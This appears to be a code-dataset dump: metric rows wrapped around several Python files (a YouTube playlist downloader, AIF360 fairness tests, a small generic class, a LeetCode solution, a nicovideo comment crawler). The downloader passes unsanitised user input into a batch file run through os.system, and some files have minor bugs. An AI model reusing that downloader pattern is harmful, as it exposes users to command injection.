| 24.096774 | 80 | 0.749665 | 76 | 747 | 7.236842 | 0.539474 | 0.029091 | 0.061818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167336 | 747 | 30 | 81 | 24.9 | 0.884244 | 0.113788 | 0 | 0.133333 | 0 | 0 | 0.003072 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.866667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
40771f48cc35e55bf1ed0377d840f200b12f6982 | 739 | py | Python | Use.py | XtremeCoder1384/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | 1 | 2019-03-04T02:26:41.000Z | 2019-03-04T02:26:41.000Z | Use.py | XtremeCoder1384/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | 1 | 2018-12-20T02:32:35.000Z | 2019-03-11T12:51:15.000Z | Use.py | IngeniousCoder/SongDownloader | 7bb06d7961ec699af8517cbd7cb4a1ec83d4fd02 | [
"MIT"
] | null | null | null | import os
import youtube_dl
os.system("setup.bat")
playlist = input("Paste the Youtube Playlist URL Here.")
track = 1
print("""THIS TOOL WILL ATTEMPT TO DOWNLOAD THE FIRST 1000 SONGS IN THE QUEUE.\n
PLEASE DO NOT INTERRUPT THE TOOL.
YOU MAY CLOSE THE TOOL WHEN IT DISPLAYS "DONE!".
ALL DOWNLOADED SONGS WILL BE IN THE SAME DIRECTORY THIS FILE IS IN.
TO EXTRACT THEM, FILTER BY MP3.""")
for x in range(1000):
file = open("Downloader.bat","w")
file.write("youtube-dl -x --playlist-start {} --audio-format mp3 --playlist-end {} {}".format(str(track),str(track),playlist))
file.close
os.system("Downloader.bat")
track = track + 1
print("DONE! You may now close this window.")
| 36.95 | 129 | 0.663058 | 113 | 739 | 4.327434 | 0.575221 | 0.03681 | 0.04499 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020725 | 0.216509 | 739 | 19 | 130 | 38.894737 | 0.823834 | 0 | 0 | 0 | 0 | 0.058824 | 0.656944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.117647 | 0 | 0.117647 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
407a65f9c4b9f958fde5ab42bad4bdd15788bb31 | 4,046 | py | Python | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 2 | 2021-07-31T20:52:37.000Z | 2022-02-15T21:05:17.000Z | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 2 | 2021-08-25T16:16:43.000Z | 2022-02-10T05:26:14.000Z | tests/test_classification_metric.py | DaveFClarke/ml_bias_checking | 90f67ebc602b6107042e6cbff3268051bb3b1c95 | [
"Apache-2.0"
] | 1 | 2019-05-21T15:31:24.000Z | 2019-05-21T15:31:24.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
import pandas as pd
from aif360.datasets import BinaryLabelDataset
from aif360.metrics import ClassificationMetric
def test_generalized_entropy_index():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.generalized_entropy_index() == 0.2
pred = data.copy()
pred[:, -1] = np.array([0, 1, 1, 0, 0, 0, 0, 1, 1, 1])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.generalized_entropy_index() == 0.3
def test_theil_index():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
assert cm.theil_index() == 4*np.log(2)/10
def test_between_all_groups():
data = np.array([[0, 1],
[0, 0],
[1, 0],
[1, 1],
[1, 0],
[1, 0],
[2, 1],
[2, 0],
[2, 1],
[2, 1]])
pred = data.copy()
pred[[3, 9], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat'])
cm = ClassificationMetric(bld, bld2)
b = np.array([1, 1, 1.25, 1.25, 1.25, 1.25, 0.75, 0.75, 0.75, 0.75])
assert cm.between_all_groups_generalized_entropy_index() == 1/20*np.sum(b**2 - 1)
def test_between_group():
data = np.array([[0, 0, 1],
[0, 1, 0],
[1, 1, 0],
[1, 1, 1],
[1, 0, 0],
[1, 0, 0]])
pred = data.copy()
pred[[0, 3], -1] = 0
pred[[4, 5], -1] = 1
df = pd.DataFrame(data, columns=['feat', 'feat2', 'label'])
df2 = pd.DataFrame(pred, columns=['feat', 'feat2', 'label'])
bld = BinaryLabelDataset(df=df, label_names=['label'],
protected_attribute_names=['feat', 'feat2'])
bld2 = BinaryLabelDataset(df=df2, label_names=['label'],
protected_attribute_names=['feat', 'feat2'])
cm = ClassificationMetric(bld, bld2, unprivileged_groups=[{'feat': 0}],
privileged_groups=[{'feat': 1}])
b = np.array([0.5, 0.5, 1.25, 1.25, 1.25, 1.25])
assert cm.between_group_generalized_entropy_index() == 1/12*np.sum(b**2 - 1)
| 34.87931 | 85 | 0.505685 | 496 | 4,046 | 3.979839 | 0.129032 | 0.02229 | 0.018237 | 0.109422 | 0.698582 | 0.681864 | 0.675785 | 0.641337 | 0.624113 | 0.624113 | 0 | 0.077936 | 0.324518 | 4,046 | 115 | 86 | 35.182609 | 0.644347 | 0 | 0 | 0.696078 | 0 | 0 | 0.04696 | 0 | 0 | 0 | 0 | 0 | 0.04902 | 1 | 0.039216 | false | 0 | 0.078431 | 0 | 0.117647 | 0.009804 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40804fd1f1dd57a07519de8f44b10f0b6f6d1a54 | 274 | py | Python | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | 1 | 2019-11-01T09:08:50.000Z | 2019-11-01T09:08:50.000Z | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | null | null | null | platonic/platonic/box/implementation.py | anatoly-scherbakov/platonic | b2d239e19f3ebf5a562b6aabcd4b82492bb03564 | [
"MIT"
] | null | null | null | from typing import TypeVar
from .abstract import AbstractBox
T = TypeVar('T')
class ValueBox(AbstractBox[T]):
_value: T
@property
def value(self) -> T:
return self._value
@value.setter
def value(self, value: T):
self._value = value
| 15.222222 | 33 | 0.635036 | 35 | 274 | 4.885714 | 0.428571 | 0.157895 | 0.140351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262774 | 274 | 17 | 34 | 16.117647 | 0.846535 | 0 | 0 | 0 | 0 | 0 | 0.00365 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0 | 0.181818 | 0.090909 | 0.636364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
40826ce560682ad3ad560f8fecc12e0ab6658bc0 | 767 | py | Python | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | 1 | 2020-12-04T07:38:16.000Z | 2020-12-04T07:38:16.000Z | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | null | null | null | 39. Combination Sum.py | MapleLove2014/leetcode | 135c79ebe98815d0e38280edfadaba90e677aff5 | [
"Apache-2.0"
] | null | null | null | class Solution:
def combinationSum(self, candidates, target):
def lookup(candidates, index, target, combine, result):
if target == 0:
result.append(combine)
return
if index >= len(candidates) and target > 0:
return
if target >= candidates[index]:
lookup(candidates, index, target - candidates[index], list(combine) + [candidates[index]], result)
lookup(candidates, index + 1, target, list(combine), result)
sorted(candidates)
result = []
lookup(candidates, 0, target, [], result)
return result
s = Solution()
print(s.combinationSum([2,3,6,7], 7))
print(s.combinationSum([2,3,5], 8))
| 34.863636 | 114 | 0.555411 | 79 | 767 | 5.392405 | 0.35443 | 0.211268 | 0.147887 | 0.126761 | 0.103286 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025097 | 0.324641 | 767 | 21 | 115 | 36.52381 | 0.797297 | 0 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4082bcb5f99112c93d2d504f08622c615955a33b | 1,204 | py | Python | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | 1 | 2015-03-04T14:06:33.000Z | 2015-03-04T14:06:33.000Z | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | 2 | 2015-03-04T02:48:18.000Z | 2015-03-04T14:18:32.000Z | crawl_comments.py | tosh1ki/NicoCrawler | 236029f103e01de9e61a042759dc9bf2cb7d3d55 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
__doc__ = '''
Crawl comment from nicovideo.jp
Usage:
crawl_comments.py --url <url> --mail <mail> --pass <pass> [--sqlite <sqlite>] [--csv <csv>]
Options:
--url <url>
--mail <mail>
--pass <pass>
--sqlite <sqlite> (optional) path of comment DB [default: comments.sqlite3]
--csv <csv> (optional) path of csv file contains urls of videos [default: crawled.csv]
'''
from docopt import docopt
from nicocrawler.nicocrawler import NicoCrawler
if __name__ == '__main__':
# コマンドライン引数の取得
args = docopt(__doc__)
url_channel_toppage = args['--url']
login_mail = args['--mail']
login_pass = args['--pass']
path_sqlite = args['--sqlite']
path_csv = args['--csv']
ncrawler = NicoCrawler(login_mail, login_pass)
ncrawler.connect_sqlite(path_sqlite)
df = ncrawler.get_all_video_url_of_season(url_channel_toppage)
ncrawler.initialize_csv_from_db(path_csv)
# # デイリーランキング1~300位の動画を取得する
# url = 'http://www.nicovideo.jp/ranking/fav/daily/all'
# ncrawler.initialize_csv_from_url(url, path_csv, max_page=3)
# ncrawler.get_all_comments_of_csv(path_csv, max_n_iter=1)
| 26.173913 | 102 | 0.671096 | 158 | 1,204 | 4.797468 | 0.411392 | 0.036939 | 0.026385 | 0.036939 | 0.08971 | 0.08971 | 0.08971 | 0.08971 | 0 | 0 | 0 | 0.008188 | 0.188538 | 1,204 | 45 | 103 | 26.755556 | 0.767656 | 0.208472 | 0 | 0 | 0 | 0.083333 | 0.450794 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.166667 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.